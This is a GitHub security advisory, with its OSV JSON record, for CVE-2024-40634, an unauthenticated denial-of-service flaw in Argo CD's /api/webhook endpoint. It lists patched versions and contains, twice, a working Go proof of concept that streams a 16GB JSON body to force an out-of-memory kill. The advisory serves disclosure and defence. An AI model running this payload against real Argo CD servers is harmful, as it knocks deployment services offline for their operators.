ghsa-jmvp-698c-4x3w
Vulnerability from github
8.7 (High) - CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
Summary
This report details a security vulnerability in Argo CD, where an unauthenticated attacker can send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation that leads to service disruption by triggering an Out Of Memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments.
Details
The webhook server always listens to requests. By default, the endpoint doesn't require authentication. It's possible to send a large, malicious request with headers (in this case "X-GitHub-Event: push") that will make ArgoCD start allocating memory to parse the incoming request. Since the request can be constructed client-side without allocating large amounts of memory, it can be arbitrarily large. Eventually, the argocd-server component will get OOMKilled as it consumes all its available memory.
The fix would be to enforce a limit on the size of the request being parsed.
PoC
Port-forward to the argocd-server service, like so:
console
kubectl port-forward svc/argocd-server -n argocd 8080:443
Run the below code:
```go package main
import ( "crypto/tls" "io" "net/http" )
// Define a custom io.Reader that generates a large dummy JSON payload. type DummyJSONReader struct { size int64 // Total size to generate read int64 // Bytes already generated }
// Read generates the next chunk of the dummy JSON payload. func (r *DummyJSONReader) Read(p []byte) (n int, err error) { if r.read >= r.size { return 0, io.EOF // Finished generating }
start := false
if r.read == 0 {
// Start of JSON
p[0] = '{'
p[1] = '"'
p[2] = 'd'
p[3] = 'a'
p[4] = 't'
p[5] = 'a'
p[6] = '"'
p[7] = ':'
p[8] = '"'
n = 9
start = true
}
for i := n; i < len(p); i++ {
if r.read+int64(i)-int64(n)+1 == r.size-1 {
// End of JSON
p[i] = '"'
p[i+1] = '}'
r.read += int64(i) + 2 - int64(n)
return i + 2 - n, nil
} else {
p[i] = 'x' // Dummy data
}
}
r.read += int64(len(p)) - int64(n)
if start {
return len(p), nil
}
return len(p) - n, nil
}
func main() { // Initialize the custom reader with the desired size (16GB in this case). payloadSize := int64(16) * 1024 * 1024 * 1024 // 16GB reader := &DummyJSONReader{size: payloadSize}
// HTTP client setup
httpClient := &http.Client{
Timeout: 0, // No timeout
Transport: &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
},
}
req, err := http.NewRequest("POST", "https://localhost:8080/api/webhook", reader)
if err != nil {
panic(err)
}
// Set headers
req.Header.Set("Content-Type", "application/json")
req.Header.Set("X-GitHub-Event", "push")
resp, err := httpClient.Do(req)
if err != nil {
panic(err)
}
defer resp.Body.Close()
println("Response status code:", resp.StatusCode)
} ```
Patches
A patch for this vulnerability has been released in the following Argo CD versions:
v2.11.6 v2.10.15 v2.9.20
For more information
If you have any questions or comments about this advisory:
Open an issue in the Argo CD issue tracker or discussions Join us on Slack in channel #argo-cd
Credits
This vulnerability was found & reported by Jakub Ciolek
The Argo team would like to thank these contributors for their responsible disclosure and constructive communications during the resolve of this issue
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"last_affected": "1.8.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.9.20"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v2"
},
"ranges": [
{
"events": [
{
"introduced": "2.10.0"
},
{
"fixed": "2.10.15"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v2"
},
"ranges": [
{
"events": [
{
"introduced": "2.11.0"
},
{
"fixed": "2.11.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-40634"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2024-07-22T17:20:02Z",
"nvd_published_at": "2024-07-22T18:15:03Z",
"severity": "HIGH"
},
"details": "### Summary\nThis report details a security vulnerability in Argo CD, where an unauthenticated attacker can send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation that leads to service disruption by triggering an Out Of Memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments.\n\n### Details\nThe webhook server always listens to requests. By default, the endpoint doesn\u0027t require authentication. It\u0027s possible to send a large, malicious request with headers (in this case \"X-GitHub-Event: push\") that will make ArgoCD start allocating memory to parse the incoming request. Since the request can be constructed client-side without allocating large amounts of memory, it can be arbitrarily large. Eventually, the argocd-server component will get OOMKilled as it consumes all its available memory.\n\nThe fix would be to enforce a limit on the size of the request being parsed.\n\n### PoC\nPort-forward to the argocd-server service, like so:\n\n```console\nkubectl port-forward svc/argocd-server -n argocd 8080:443\n```\n\nRun the below code:\n\n```go\npackage main\n\nimport (\n\t\"crypto/tls\"\n\t\"io\"\n\t\"net/http\"\n)\n\n// Define a custom io.Reader that generates a large dummy JSON payload.\ntype DummyJSONReader struct {\n\tsize int64 // Total size to generate\n\tread int64 // Bytes already generated\n}\n\n// Read generates the next chunk of the dummy JSON payload.\nfunc (r *DummyJSONReader) Read(p []byte) (n int, err error) {\n\tif r.read \u003e= r.size {\n\t\treturn 0, io.EOF // Finished generating\n\t}\n\n\tstart := false\n\tif r.read == 0 {\n\t\t// Start of JSON\n\t\tp[0] = \u0027{\u0027\n\t\tp[1] = \u0027\"\u0027\n\t\tp[2] = \u0027d\u0027\n\t\tp[3] = \u0027a\u0027\n\t\tp[4] = \u0027t\u0027\n\t\tp[5] = \u0027a\u0027\n\t\tp[6] = \u0027\"\u0027\n\t\tp[7] = \u0027:\u0027\n\t\tp[8] = \u0027\"\u0027\n\t\tn = 9\n\t\tstart = true\n\t}\n\n\tfor i := n; i \u003c len(p); i++ {\n\t\tif r.read+int64(i)-int64(n)+1 == r.size-1 {\n\t\t\t// End of JSON\n\t\t\tp[i] = \u0027\"\u0027\n\t\t\tp[i+1] = \u0027}\u0027\n\t\t\tr.read += int64(i) + 2 - int64(n)\n\t\t\treturn i + 2 - n, nil\n\t\t} else {\n\t\t\tp[i] = \u0027x\u0027 // Dummy data\n\t\t}\n\t}\n\n\tr.read += int64(len(p)) - int64(n)\n\tif start {\n\t\treturn len(p), nil\n\t}\n\treturn len(p) - n, nil\n}\n\nfunc main() {\n\t// Initialize the custom reader with the desired size (16GB in this case).\n\tpayloadSize := int64(16) * 1024 * 1024 * 1024 // 16GB\n\treader := \u0026DummyJSONReader{size: payloadSize}\n\n\t// HTTP client setup\n\thttpClient := \u0026http.Client{\n\t\tTimeout: 0, // No timeout\n\t\tTransport: \u0026http.Transport{\n\t\t\tTLSClientConfig: \u0026tls.Config{InsecureSkipVerify: true},\n\t\t},\n\t}\n\n\treq, err := http.NewRequest(\"POST\", \"https://localhost:8080/api/webhook\", reader)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\t// Set headers\n\treq.Header.Set(\"Content-Type\", \"application/json\")\n\treq.Header.Set(\"X-GitHub-Event\", \"push\")\n\n\tresp, err := httpClient.Do(req)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer resp.Body.Close()\n\n\tprintln(\"Response status code:\", resp.StatusCode)\n}\n```\n\n### Patches\nA patch for this vulnerability has been released in the following Argo CD versions:\n\nv2.11.6\nv2.10.15\nv2.9.20\n\n### For more information\nIf you have any questions or comments about this advisory:\n\nOpen an issue in [the Argo CD issue tracker](https://github.com/argoproj/argo-cd/issues) or [discussions](https://github.com/argoproj/argo-cd/discussions)\nJoin us on [Slack](https://argoproj.github.io/community/join-slack) in channel #argo-cd\n\n### Credits\nThis vulnerability was found \u0026 reported by Jakub Ciolek\n\nThe Argo team would like to thank these contributors for their responsible disclosure and constructive communications during the resolve of this issue\n",
"id": "GHSA-jmvp-698c-4x3w",
"modified": "2024-08-07T14:17:41Z",
"published": "2024-07-22T17:20:02Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40634"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df"
},
{
"type": "PACKAGE",
"url": "https://github.com/argoproj/argo-cd"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2024-3002"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Argo CD Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint"
}